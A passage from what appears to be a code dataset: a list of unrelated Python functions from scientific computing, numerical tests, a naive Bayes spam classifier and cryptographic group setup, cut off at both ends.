l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = self.F_EE(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTE(l2)\n result += self.F_EE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTE(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TT_TE.__func__, \"integ\"):\n self.N_TT_TE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_TE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_TE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def calcualte_inte_vn(pT_low, pT_high, data):\n npT = 50\n pT_inte_array = linspace(pT_low, pT_high, npT)\n dpT = pT_inte_array[1] - pT_inte_array[0]\n dN_event = data[:, 2]\n pT_event = data[:, 0]\n dN_interp = exp(interp(pT_inte_array, pT_event, log(dN_event+1e-30)))\n N_event = data[:, -1]\n N_interp = exp(interp(pT_inte_array, pT_event, log(N_event+1e-30)))\n N = sum(N_interp)*dpT/0.1\n temp_vn_array = [N,]\n for iorder in range(1, n_order):\n vn_real_event = data[:, 4*iorder]\n vn_imag_event = data[:, 4*iorder+2]\n vn_real_interp = interp(pT_inte_array, pT_event, vn_real_event)\n vn_imag_interp = interp(pT_inte_array, pT_event, vn_imag_event)\n vn_real_inte = (\n sum(vn_real_interp*dN_interp*pT_inte_array)\n /sum(dN_interp*pT_inte_array))\n vn_imag_inte = (\n sum(vn_imag_interp*dN_interp*pT_inte_array)\n /sum(dN_interp*pT_inte_array))\n vn_inte = vn_real_inte + 1j*vn_imag_inte\n temp_vn_array.append(vn_inte)\n return(temp_vn_array)", "def system(p):\r\n\r\n C1, C2, C3, C4, C5, C6, C7, C8, \\\r\n C9,C10,C11,C12,C13,C14,C15,C16,C17,C18,C19,C20,C21,C22, \\\r\n C23, C24, C25, C26, C27, C28, C29, C30, C31, C32, C33, C34,\\\r\n C35, C36, C37, C38, C39, C40, C41, C42, C43, \\\r\n C44, C45, C46, C47, C48, C49, C50, C51, C52, C53, C54, C55, C56 = p\r\n\r\n C = [C1, C2, C3, C4, C5, C6, C7, C8,\r\n C9,C10,C11,C12,C13,C14,C15,C16,C17,C18,C19,C20,C21,C22,\r\n C23, C24, C25, C26, C27, C28, C29, C30, C31, C32, C33, C34, C35, C36, C37,\r\n C38, C39, C40, C41, C42, C43,\r\n C44, C45, C46, C47, C48, C49, C50, C51, C52, C53, C54, C55, C56]\r\n\r\n eqs = [C[i] * (Kd[i] + Rtot - sum(C)) + Etot[i] * (sum(C) - Rtot) for i in range(n)]\r\n\r\n return eqs", "def tpm3_1_8_start_genomic():\n return \"TPM3\", \"NC_000001.11\", 154191901, 154192135, -1", "def N_TE_TB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_TB(l1, l2, phi)*self.CMB.ftotalTT(l1)*self.CMB.ftotalEB(l2)\n result += 0. #self.F_TB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalTE(l2)\n result *= self.F_TE(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TE_TB.__func__, \"integ\"):\n self.N_TE_TB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TE_TB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TE_TB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def test_simple():\n B = 100\n H = 20\n E = 210000\n sections = ((B, H, 0, E),)\n EI, top, bot = bm.EI(sections, E)\n EIc = E * B * (H ** 3) / 12\n assert 0.99 < EI / EIc < 1.01\n assert top == H / 2\n assert bot == -H / 2", "def prove_CM() -> Proof:\n # Optional Task 6.7f", "def cal_et(self):\r\n\r\n for ind in range(2**(4*self.k)):\r\n i=0\r\n num = int(bin(ind)[2:])\r\n aux = listarNum(num)\r\n list_num=np.array([])\r\n while i < 4*self.k:\r\n if len(aux) < 4*self.k-i:\r\n list_num=np.append(list_num, [0.])\r\n elif len(aux)==4*self.k-i:\r\n list_num=np.append(list_num, aux)\r\n i=i+1\r\n \"\"\"\r\n reversed_list_num = list_num[::-1]\r\n self.et[ind]=reversed_list_num\r\n \"\"\"\r\n self.et[ind]=list_num", "def calibration(N,kb,T,Ekinv,V):\n lamb = np.sqrt((N-1)*3*kb*T/(Ekinv*2))\n \n if lamb < 0.9999:\n V = lamb*V\n elif lamb>1.0001:\n V = lamb*V\n \n return V", "def test_inu(self):\n lmax = 3\n x = np.array([5000])\n result_i, result_k = bessel_sk.lniknu(x, lmax)\n pih = np.log(0.5*np.pi)\n expP = (1+np.exp(-2*x))\n expM = (1-np.exp(-2*x))\n expected_i = np.array([\n -np.log(2*x**1) + x + np.log(expM),\n -np.log(2*x**2) + x + np.log(expM*(x+1)+x-1),\n -np.log(2*x**3) + x + np.log((3+x**2)*expM-3*x*expP),\n -np.log(2*x**4) + x + np.log((15*x+x**3)*expP-(15+6*x**2)*expM) \n ])\n expected_k = np.array([pih -x - 1*np.log(x),\n pih -x - 2*np.log(x) + np.log(x+1),\n pih -x - 3*np.log(x) + np.log(x**2+3*x+3),\n pih -x - 4*np.log(x) + np.log(x**3+6*x**2+15*x+15)\n ])\n assert_almost_equal(result_i[0]/expected_i.T, 1, decimal=4)\n assert_almost_equal(result_k[0]/expected_k.T, 1, decimal=4)", "def test_get_nveto_pmts(self):\n pass", "def gen_ep_data(self,ntrials,trlen):\n self.resort_emat()\n ## instruction\n # for each trial, generate random instruction encoding sequence\n i_encoding_input = np.array([\n np.random.permutation(np.arange(1,self.nmaps+1)) \n for i in range(ntrials)\n ])\n i_test_input = np.zeros([ntrials,trlen])\n i_input = np.concatenate([\n i_encoding_input,i_test_input],\n 1).astype(int).reshape(-1) # (ntrials,trlen+)\n ## stimulus\n x_encoding_input = i_encoding_input\n x_test_input = np.random.randint(1,self.nmaps+1,[ntrials,trlen])\n x_input = np.concatenate([x_encoding_input,x_test_input],1)\n # print('X',x_input)\n ''' \n embed x_input: \n [ntrials,nmaps+trlen] -> s_input [ntrials*(nmaps+trlen),edim]\n explicit loop required for flatten and embedd x_input\n because if switchmaps=1, matrix is resorted between trials\n and therefore same stimulus token integers correspond to\n different stimulus embeddings on different trials\n '''\n s_input = -np.ones([ntrials,(self.nmaps+trlen),self.stimdim])\n for trialn,x_input_trial in enumerate(x_input): \n if self.switchmaps: self.resort_emat()\n s_input[trialn] = self.emat[x_input_trial]\n # format output\n i_input = tr.unsqueeze(tr.LongTensor(i_input),1)\n s_input = tr.unsqueeze(tr.Tensor(np.concatenate(s_input)),1)\n yseq = tr.unsqueeze(tr.LongTensor(x_input.reshape(-1)),1)\n return i_input,s_input,yseq", "def e_step(self):\n # update VMF probabilities (Equation (3))\n logP = np.dot(self.features, self.mu.T)*self.kappa + np.log(self.pi).reshape(1,-1) # n by k\n logP_norm = logP - logsumexp(logP, axis=1).reshape(-1,1)\n self.p = np.exp(logP_norm)\n self.mllk = np.mean(logsumexp(logP, axis=1))", "def N_TE_EB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_EB(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEB(l2)\n result += 0. #self.F_EB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalEE(l2)\n result *= self.F_TE(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TE_EB.__func__, \"integ\"):\n self.N_TE_EB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TE_EB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TE_EB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def prove_N() -> Proof:\n # Optional Task 6.8", "def eulerphi(n):\r\n\treturn euler_phi(n)", "def TMM(x,N,n,trun_basis):\n Mat = np.zeros([len(trun_basis),len(trun_basis)])\n print('making TMM')\n perms = [int((x**n * iii)%N) for iii in trun_basis] # Modular multiplication\n for iii in range(len(trun_basis)):\n if trun_basis.__contains__(perms[iii]):\n Mat[iii,trun_basis.index(perms[iii])] = 1\n return Mat", "def gen_ep_data(self,ntrials,trlen):\n ## instruction\n # for each trial, generate random instruction encoding sequence\n i_encoding_input = np.array([\n np.random.permutation(np.arange(1,self.nmaps+1)) \n for i in range(ntrials)\n ])\n i_test_input = np.zeros([ntrials,trlen])\n i_input = np.concatenate([\n i_encoding_input,i_test_input],\n 1).astype(int).reshape(-1) # (ntrials,trlen+)\n ## stimulus\n x_encoding_input = i_encoding_input\n x_test_input = np.random.randint(1,self.nmaps+1,[ntrials,trlen])\n x_input = np.concatenate([i_encoding_input,x_test_input],1)\n ''' \n embed x_input: \n [ntrials,nmaps+trlen] -> s_input [ntrials*(nmaps+trlen),edim]\n explicit loop required for flatten and embedd x_input\n because if switchmaps=1, matrix is resorted between trials\n and therefore same stimulus token integers correspond to\n different stimulus embeddings on different trials\n '''\n s_input = -np.ones([ntrials,(self.nmaps+trlen),self.stimdim])\n for trialn,x_input_trial in enumerate(x_input): \n if self.switchmaps: self.resort_emat()\n s_input[trialn] = self.emat[x_input_trial]\n \n # format output\n i_input = tr.unsqueeze(tr.LongTensor(i_input),1)\n s_input = tr.unsqueeze(tr.Tensor(np.concatenate(s_input)),1)\n yseq = tr.unsqueeze(tr.LongTensor(x_input.reshape(-1)),1)\n if return_trial_flag:\n tr_flag = np.concatenate([i*np.ones(self.nmaps+trlen) for i in range(ntrials)])\n tr_flag = tr.unsqueeze(tr.LongTensor(tr_flag),1)\n return tr_flag,i_input,s_input,yseq,\n else:\n return i_input,s_input,yseq", "def getEG(n,int_method,func) :\n m = np.asarray([0.5,0.6,0.7,0.8,0.9,1,1.1,1.2,1.3,1.4,1.5,2,2.5,3,3.5,4,\n 4.5,5,5.5,6,6.5,7,7.5,8,8.5,9,9.5,10])\n bes = np.asarray([0.5,0.47768,0.44879,0.39831,0.25858,0,0.15502,0.25699,\n 0.30896,0.35245,0.39119,0.51822,0.53678,0.54984,0.55847,\n 0.56395,0.57054,0.57950,0.58402,0.58765,0.59512,0.60214,\n 0.60469,0.61143,0.61789,0.62443,0.63097,0.63694])\n p = np.asarray([1,0.85417,0.94685,1.04467,2.55052,0,1.59086,\n 1.00670,0.88866,0.83763,0.81030,0.76108,0.83093,0.86863,\n 0.89233,0.90909,0.92097,0.93007,0.93735,0.94332,0.94813,\n 0.95193,0.95557,0.95864,0.96107,0.96360,0.96570,\n 0.96788])\n h0 = np.asarray([0,-0.03567,-0.04808,-0.04315,-0.01879,0,0.00041,0.00069,\n 0.00639,0.01405,0.02294,0.07814,0.13994,0.19278,0.23793,\n 0.27678,0.31039,0.33974,0.36585,0.38917,0.41003,0.42891,\n 0.44621,0.46195,0.47644,0.48982,0.50223,0.51379])\n h1 = np.asarray([0,0.26899, 0.10571,0.01763,-0.39382,0,0.15211,0.05665,\n 0.00933,-0.02791,-0.05876,-0.16720,-0.13033,-0.10455 ,\n -0.08618,-0.07208,-0.06179,-0.05369,-0.04715,-0.04176,\n -0.03742,-0.03408,-0.03081,-0.02808,-0.02599,-0.02375,\n -0.02194,-0.02004])\n h2 = np.asarray([0,-0.09016,-0.06893,-0.04971,-0.08828,0,-0.03341,\n -0.03964,-0.04456,-0.04775,-0.04984,-0.05381,-0.03570,\n -0.02476,-0.01789,-0.01333,-0.01028,-0.00812,-0.00653,\n -0.00534,-0.00444,-0.00376,-0.00319,-0.00274,-0.00238,\n -0.00207,-0.00182,-0.00160])\n h3 = np.asarray([0,0.03993,0.03363,0.02216,-0.00797,0,0.00899,0.01172,\n 0.01150,0.01026,0.00860,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n 0])\n \n if (func == True) :\n int_bes = splev(n,splrep(m, bes))\n int_p = splev(n,splrep(m, p))\n int_h0 = splev(n,splrep(m, h0))\n int_h1 = splev(n,splrep(m, h1))\n int_h2 = splev(n,splrep(m, h2))\n int_h3 = splev(n,splrep(m, h3))\n else :\n int_bes = griddata(m, bes, n, method=int_method)\n int_p = griddata(m, p, n, method=int_method)\n int_h0 = griddata(m, h0, n, method=int_method)\n int_h1 = griddata(m, h1, n, method=int_method)\n int_h2 = griddata(m, h2, n, method=int_method)\n int_h3 = griddata(m, h3, n, method=int_method)\n \n return np.asarray([int_bes,int_p,int_h0,int_h1,int_h2,int_h3])", "def N_TE_EE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = self.F_EE(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEE(l2)\n result += self.F_EE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEE(l2)\n result *= self.F_TE(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TE_EE.__func__, \"integ\"):\n self.N_TE_EE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TE_EE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TE_EE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def ev2vi_nrl(eV,mu):\n return 9.79e3/np.sqrt(mu)*np.sqrt(2.*eV)", "def vinet(p, v):\n x = ( v / p[3] ) ** ( 1.0 / 3 )\n xi = 3.0 / 2 * ( p[2] - 1 )\n return p[0] + 9 * p[1] * p[3] / ( xi**2 ) * ( 1 + ( xi * ( 1 - x ) - 1 ) * np.exp( xi * ( 1 - x ) ) )", "def TR_algo8(self, h):\n ve = 0\n vd = self._vd\n k = 0\n p = [0,]*self._N\n m = max(self._compact_M)\n vM = sum(self._compact_M)\n for i in range(m-1, -1, -1):\n mu = self.extract_mask(i)\n mu_norm = sum([bit_component(mu, j) for j in range(self._N)])\n mu = rotate_right(mu, vd+1)\n pi = rotate_right(ve, vd+1) & (~mu & 2**self._N-1)\n r = [bit_component(h, vM - k - (j+1)) for j in range(mu_norm)][::-1]\n r = sum( [rx*2**j for j, rx in enumerate(r)] )\n k = k + mu_norm\n w = gcr_inv(r, mu, pi)\n l = gc(w)\n l = T_inv(ve, vd, l)\n for j in range(self._N):\n p[j] |= bit_component(l, j) << i\n ve = ve ^ (rotate_left(e(w), vd+1))\n vd = (vd + d(w) + 1) % self._N\n return p", "def simulating_verlet(n,N,D,t,Rv,sigma,epsilon,dt,m,T,dim,kb,V,steps_r):\n Ekinv = np.zeros((n,1))\n Epotv = np.zeros((n,1))\n Ev = np.zeros((n,1))\n Gpc = np.zeros((steps_r,n))\n for k in range(len(t)):\n F = particle_forceV(Rv[-1], N, sigma, epsilon, D)\n Rv.append(particle_positionV(copy.deepcopy(Rv[-1]), V, dt, F, D)) \n V = particle_velocityV(V, F, dt, Rv, sigma, epsilon, D, N)\n Ekinv[k] = np.sum(1/(2*m)*(V**2))\n \n #Calibration\n if (int(k%(10)) == int(0) & int(k)<int(len(t)/2)):\n V = calibration(N, kb,T,Ekinv[k],V)\n Ekinv[k] = np.sum(1/(2*m)*(V**2))\n if int(k)> int(len(t)-50):\n Gpc[:,k], dist, dr = pair_correlation(N,Rv[-1],D,steps_r)\n Uv = particle_LJV(Rv[-1], N, D) \n Epotv[k] = abs(Uv)/2 \n Ev[k] = Ekinv[k]+Epotv[k]\n return Rv, Ekinv, Epotv, Ev, Gpc", "def eulerphi(n):\n\treturn euler_phi(n)", "def test_post_nveto_pmts(self):\n pass", "def N_TT_TE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = self.F_TE(l1, l2, phi)*self.CMB.ftotalTT(l1)*self.CMB.ftotalTE(l2)\n result += self.F_TE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTT(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n\n # if first time, initialize integrator\n if not hasattr(self.N_TT_TE.__func__, \"integ\"):\n self.N_TT_TE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_TE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_TE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def Phi_nu_mu1(self, E_nu, N=1e24):\n #check this \n try:\n phi = [0.]*len(E_nu)\n\n Int = lambda x: self.crossSection(x) * self.protonFlux(x) * self.F_nu_mu_1(E_nu/x, x) / x\n\n for i, E_nu in enumerate(E_nu):\n logE_min = np.log10(E_nu)\n logE_max = 10\n\n Intervals = int(np.ceil(logE_max-logE_min))\n\n IntegrationBoundary = np.logspace(logE_min, logE_max, Intervals+1)\n #print IntegrationBoundary\n\n for j in range(Intervals):\n phi[i] += 1.6*N*quad(Int, IntegrationBoundary[j], IntegrationBoundary[j+1])[0]\n\n return np.array(phi)\n\n except TypeError as e:\n phi = 0.\n\n Int = lambda x: self.crossSection(x) * self.protonFlux(x) * self.F_nu_mu_1(E_nu/x, x) / x\n\n logE_min = np.log10(E_nu)\n logE_max = 10\n\n Intervals = int(np.ceil(logE_max-logE_min))\n IntegrationBoundary = np.logspace(logE_min, logE_max, Intervals+1)\n #print IntegrationBoundary\n for i in range(Intervals):\n phi += 1.6*N*quad(Int, IntegrationBoundary[i], IntegrationBoundary[i+1])[0]\n print (phi)\n\n return phi", "def testingPhase(SP, HP):\n classification= {}\n TP, TN, FP, FN = 0,0,0,0\n\n pullData = open(\"labels\", \"r\").read()\n dataArray= pullData.split('\\n')\n dataArrayTest=dataArray[21301:-1] #opens files from folder 070 onwards \n \n for eachLine in dataArrayTest:\n kind,file = eachLine.split(' ')\n print(file,kind)\n if (kind == \"spam\"):\n SO = 1 #initially stating that it is a spam not a ham\n HO = 0\n elif (kind== \"ham\"):\n HO = 1\n SO = 0\n file=file.strip('../') \n fileDir = os.path.dirname(os.path.realpath('__file__'))\n filepath = os.path.join(fileDir,file) \n email=\"\"\n fh = open(filepath, encoding=\"ascii\", errors=\"ignore\")\n for line in fh:\n email += line\n fh.close()\n email= email.lower()\n email_words = processText(contentEmail(email))\n email_words = tuple(email_words)\n spam_ba= math.log(PS,10) #initially contains value of Spam Probability\n ham_ba= math.log(PH, 10) #initially contains value of Ham Probability\n\n\n \"\"\"BAYES THEOREM\"\"\"\n for word, value in SP.items(): \n if word in email_words:\n x = math.log(value, 10)\n spam_ba += x\n else:\n x = math.log(1-value, 10)\n #print(x)\n spam_ba += x \n if ham_ba > spam_ba:\n label=\"ham\"\n elif ham_ba < spam_ba:\n label=\"spam\"\n\n for word,value in HP.items(): \n if word in email_words:\n x = math.log(value, 10)\n #print(x)\n ham_ba += x \n else:\n x = math.log(1-value, 10)\n #print(x)\n ham_ba += x \n if ham_ba > spam_ba:\n label=\"ham\"\n elif ham_ba < spam_ba:\n label=\"spam\"\n\n print(\"Spam Prob: \" ,spam_ba, \"Ham Prob: \" ,ham_ba)\n\n #This part determines if the emails are ham or spam depending on the calculations\n if HO == 1 and label == \"ham\":\n TN +=1\n if HO == 1 and label == \"spam\":\n FP +=1\n if SO == 1 and label == \"spam\":\n TP +=1\n if SO == 1 and label == \"ham\":\n FN +=1\n #print(classification)\n print(TP, TN, FP, FN)\n print(spam_ba)\n print(ham_ba)\n \"\"\"COMPUTES PRECISION AND RECALL\"\"\"\n Precision = TP/(TP+FP)\n Recall = TP/(TP+FN)\n\n print(\"Precision: \", Precision, \" \", \"Recall: \", Recall)", "def _inv_totient_estimate(m):\n primes = [ d + 1 for d in divisors(m) if isprime(d + 1) ]\n\n a, b = 1, 1\n\n for p in primes:\n a *= p\n b *= p - 1\n\n L = m\n U = int(math.ceil(m*(float(a)/b)))\n\n P = p = 2\n primes = []\n\n while P <= U:\n p = nextprime(p)\n primes.append(p)\n P *= p\n\n P //= p\n b = 1\n\n for p in primes[:-1]:\n b *= p - 1\n\n U = int(math.ceil(m*(float(P)/b)))\n\n return L, U", "def compute_thermo(E,dos,TT):\n if (len(dos)<3):\n print (\"Not enough points in the phonon DOS!\")\n return None\n \n ZPE = 0.5*dos_integral(E,dos,1)\n modes = dos_integral(E,dos)\n \n EvibT = np.zeros(len(TT))\n SvibT = np.zeros(len(TT))\n CvibT = np.zeros(len(TT))\n FvibT = np.zeros(len(TT))\n for i in range(0,len(TT)):\n h = 0.5*(E[2]-E[0])\n arg = K_BOLTZMANN_RY*TT[i]\n arg2 = 2.0 * arg\n Evib = 0.0\n Svib = 0.0\n Cvib = 0.0\n for j in range(0,len(dos)-3,3):\n\n Evib += 3.0*E[j]/tanh(E[j]/(arg2))*dos[j]+\\\n 3.0*E[j+1]/tanh(E[j+1]/(arg2))*dos[j+1]+\\\n 2.0*E[j+2]/tanh(E[j+2]/(arg2))*dos[j+2]\n \n Svib += 3.0*(E[j]/arg2/tanh(E[j]/arg2)-log(2.0*sinh(E[j]/arg2)))*dos[j]+\\\n 3.0*(E[j+1]/arg2/tanh(E[j+1]/arg2)-log(2.0*sinh(E[j+1]/arg2)))*dos[j+1]+\\\n 2.0*(E[j+2]/arg2/tanh(E[j+2]/arg2)-log(2.0*sinh(E[j+2]/arg2)))*dos[j+2]\n\n try: # avoid overflow error for arg very small\n Cvib += 3.0*pow(E[j]/arg,2)/( 4.0*pow(sinh(E[j]/(arg2)),2) )*dos[j]+\\\n 3.0*pow(E[j+1]/arg,2)/( 4.0*pow(sinh(E[j+1]/(arg2)),2) )*dos[j+1]+\\\n 2.0*pow(E[j+2]/arg,2)/( 4.0*pow(sinh(E[j+2]/(arg2)),2) )*dos[j+2]\n except:\n Cvib += 0.0\n\n EvibT[i] = h*0.5*Evib*3.0/8.0 # h is the integration step, 0.5 comes from the equation for E,\n # the factor 3.0/8.0 comes from the Simpson 3/8 rule\n SvibT[i] = h*K_BOLTZMANN_RY*Svib*3.0/8.0\n CvibT[i] = h*K_BOLTZMANN_RY*Cvib*3.0/8.0\n FvibT = EvibT - SvibT * TT\n\n print ()\n return TT, EvibT, SvibT, CvibT, FvibT, ZPE, modes", "def E_Dynamic_MavkoEtAl2009(rhob,DTS,PR):\n E = (2*(rhob*1000)*((304800/DTS)**2)*(1+PR))/1000000\n return E", "def createCNDTransEmiProb(self, qtc_type='qtcc'):\n \n if qtc_type == 'qtcb':\n state_num = 11\n elif qtc_type == 'qtcc':\n state_num = 83\n elif qtc_type == 'qtcbc':\n state_num = 92\n else:\n raise(QtcException(\"createCNDTransEmiProb: Unknow qtc type: {!r}\".format(qtc_type)))\n \n qtc = []\n \n if qtc_type == 'qtcb':\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n qtc.append([i-2, j-2])\n elif qtc_type == 'qtcc':\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n for k in xrange(1, 4):\n for l in xrange(1, 4):\n qtc.append([i-2, j-2, k-2, l-2])\n elif qtc_type == 'qtcbc':\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n qtc.append([i-2, j-2, np.NaN, np.NaN])\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n for k in xrange(1, 4):\n for l in xrange(1, 4):\n qtc.append([i-2, j-2, k-2, l-2])\n else:\n raise(QtcException(\"createCNDTransEmiProb: Unknow qtc type: {!r}\".format(qtc_type)))\n \n qtc = np.array(qtc)\n #np.savetxt('/home/cdondrup/qtc.csv', qtc, delimiter=',', fmt='%1f')\n \n trans = np.zeros((state_num, state_num))\n for i1 in xrange(qtc.shape[0]):\n for i2 in xrange(i1+1, qtc.shape[0]):\n trans[i1+1, i2+1] = np.nanmax(np.absolute(qtc[i1]-qtc[i2])) != 2\n if trans[i1+1, i2+1] == 1:\n for j1 in xrange(qtc.shape[1]-1):\n for j2 in xrange(j1+1, qtc.shape[1]):\n if sum(np.absolute(qtc[i1, [j1, j2]])) == 1 \\\n and sum(np.absolute(qtc[i2, [j1, j2]])) == 1:\n if np.nanmax(np.absolute(qtc[i1, [j1, j2]]-qtc[i2, [j1, j2]])) > 0 \\\n and sum(qtc[i1, [j1, j2]]-qtc[i2, [j1,j2]]) != 1:\n trans[i1+1, i2+1] = 5\n break\n if trans[i1+1, i2+1] != 1:\n break\n trans[i2+1, i1+1] = trans[i1+1, i2+1]\n \n trans[trans != 1] = 0\n #np.savetxt('/home/cdondrup/trans.csv', np.rint(trans).astype(int), delimiter=',', fmt='%i')\n trans[trans == 0] = 0.00001\n trans[0] = 1\n trans[:, 0] = 0\n trans[:, -1] = 1\n trans[0, -1] = 0\n trans[-1] = 0\n trans += np.dot(np.eye(state_num), 0.00001)\n trans[0, 0] = 0\n \n trans = trans / trans.sum(axis=1).reshape(-1, 1)\n #np.savetxt('/home/cdondrup/trans.csv', trans, delimiter=',')\n \n emi = np.eye(state_num)\n emi[emi == 0] = 0.0001\n \n return trans, emi", "def N_TT_TB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_TB(l1, l2, phi)*self.CMB.ftotalTT(l1)*self.CMB.ftotalTB(l2)\n result += 0. #self.F_TB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalTT(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TT_TB.__func__, \"integ\"):\n self.N_TT_TB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_TB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_TB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def test_uneven_sw():\n B = 100\n t = 1\n H = 30\n E = 20000\n sections = ((2 * B, t, 0, E), (B, t, H - t, E))\n EI, top, bot = bm.EI(sections, E)\n assert 1.95 < abs(bot) / top < 1.96", "def __init__(self):\n self.modulo = Bn.from_decimal(\n \"104274339861599109435228713715012587636997755949475388588516377743858594829526246207815488124753620113654378182611410869843692693515483841382145633329409600605358434237971173658402530546783352648106247803514459454270482848535758539851532076708790494943517894654046363923325714750480680188239471613308156143136830981518627799499285672172738874571644891075726999700275877298890101149587792836886648258733566308895110719770960720300899066897289080371563621668124216187770149740826973622700315037066876583866156345639276386510201006397141393775575135928749962477326783336184434815042335057049432193006499521591281357491659\")\n self.generator = FFElement(Bn.from_decimal(\n \"81099144573950922883933823309397903831307729923277144841334749422315595743437219371821139976270089085817737914449263008752457618988770955139245864971428025146021819160336876692205993068777078938240475549226164124952577975303221660397947822711916352061614341728562734417872584743294922245761212731150483802964283263230741041446988298186702952974697967148198190463075071628059974486966250538161512056563568090071474143434146441589514816635339916481756264419884177841781745530245175458079612447970067897693825433138760936325168807521204548329680909932742314536162869895548442852131478295912996232046258690790851591666552\"),\n self.modulo, self.order())", "def TR_algo7(self, p):\n h = 0\n ve = 0\n vd = self._vd\n m = max(self._compact_M)\n for i in range(m-1, -1, -1):\n mu = self.extract_mask(i)\n mu_norm = sum([bit_component(mu, j) for j in range(self._N)])\n mu = rotate_right(mu, vd+1)\n pi = rotate_right(ve, vd+1) & ((~mu) & 2**self._N-1)\n l = [bit_component(px, i) for px in p]\n # 2. construct a integer whose bits are given by l\n l = sum( [lx*2**j for j, lx in enumerate(l)] )\n l = T(ve, vd, l)\n w = inverse_gc(l)\n r = gcr(w, mu, pi)\n ve = ve ^ rotate_left(e(w), vd+1)\n vd = (vd + d(w) + 1) % self._N\n h = (h << mu_norm) | r\n return h", "def TDErrorFunction(Prof,x,Trx,rb_spec,abs_spec,dr,inu0,bsrMult,base_T,base_P,r0,lam=[0,0,0,0,0,0]):\n \n iR = Prof['WV Online'].size # range index for a profile into 1D x array\n x2 = np.reshape(x,(iR+1,6))\n xK = x2[0,:] # constants [HSRL Mol HSRL Comb, 